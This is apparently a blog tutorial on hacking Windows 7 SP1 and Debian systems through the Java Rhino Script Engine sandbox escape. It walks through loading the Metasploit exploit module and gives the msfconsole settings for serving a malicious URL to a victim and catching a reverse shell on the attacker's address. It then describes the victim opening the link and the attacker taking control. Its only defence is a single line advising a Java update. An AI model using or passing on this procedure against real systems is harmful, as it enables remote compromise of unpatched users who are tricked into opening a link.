Hacking Windows 7 SP1 via Java Rhino Script Engine Vulnerability

Hacking Windows 7 SP1 via Java Rhino Script Engine Vulnerability

Bookmark

Type : Tutorial

Level : Medium

Attacker O.S : Backtrack 5 R 1

Victim O.S : Windows 7 SP 1, Linux Debian 6

Exploit Credits : Michael Schierl, Juan Vazquez, Edward D. Teach, Sinn3r

This is a vulnerability in the Rhino Script Engine that can be used by a Java Applet to run arbitrary Java code outside of the sandbox. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Oracle Java. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The quote I got from zerodayinitiative.com. This exploit will attack vulnerability found in Java Runtime environment, all Java version 6, 7 are affected. To view the details of affected Java version, you can refer to this Oracle advisories(http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html).

Requirements :

1. Java Rhino Exploit (download link) and Exploit.class

Download

Step By Step :

1. Download the Java Rhino exploit from the link above, and then copy into following folder

cp java_rhino.rb /pentest/exploits/framework/modules/exploits/multi/browser/

2. Open your Metasploit console by typing msfconsole from terminal, and then use the exploit you've just added before and also set up the payload.

Hacking Windows 7 SP1 via Java Rhino Script Engine Vulnerability

3. The next step you need to define the switch to make sure an attack can be launched successfully, and after everything looks fine and good, we're ready to perform the exploit to run the exploit server.

Hacking Windows 7 SP1 via Java Rhino Script Engine Vulnerability

Information :

set srvhost 192.168.8.93 --> attacker ip address

set srvport 80 --> attacker local port to open

set uripath java_rhino --> uripath to send to victim

set lhost 192.168.8.93 --> address for reverse connection if attack successful

set lport 443 --> local port to handle victim connection if attack success

exploit --> run the exploit

4. The picture below is screenshot from victim when he/she opened the malicious URL.

Hacking Windows 7 SP1 via Java Rhino Script Engine Vulnerability

5. As soon as victim open our malicious link, our metasploit console get something interesting.

Hacking Windows 7 SP1 via Java Rhino Script Engine Vulnerability

Note: if you got this error :

Exception handling request: No such file or directory – /opt/framework3/msf3/data/exploits/cve-2011-3544/Exploit.class

you can see the first comment down here how to solve it.

6. This picture below when I'm try on Debian 6 Iceweasel.

Hacking Windows 7 SP1 via Java Rhino Script Engine Vulnerability

Pwn3d!

Countermeasure :

1. Update your Java Runtime to the newer version.

 

Subscribe Now To Get Latest Hacking Tutorial on Your E-Mail

Share this article if you found it was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com